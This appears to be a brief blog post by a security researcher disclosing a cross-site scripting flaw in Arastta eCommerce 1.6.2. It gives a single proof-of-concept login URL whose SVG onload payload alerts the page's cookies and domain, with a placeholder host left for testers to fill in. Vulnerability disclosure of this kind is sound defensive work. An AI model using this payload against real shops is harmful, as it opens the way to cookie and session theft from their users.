Arastta 1.6.2 XSS Disclosure

Synopsis: Arastta 1.6.2 xss vulnerability
Product: Arastta eCommerce: Free Shopping Cart
Version: 1.6.2
Researcher: Matt Landers
mattjoeland@gmail.com
twitter.com/matthewjland
https://mjlanders.org/

The xss that I have found is fairly straight forward.

http://inserthostnamehere.com/index.php/login/"--!>GIF89a/*<svg/onload=alert(document.cookie)>*/=alert(document.domain)//;

Replace 'inserthostnamehere.com' with the server you would like to test.

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s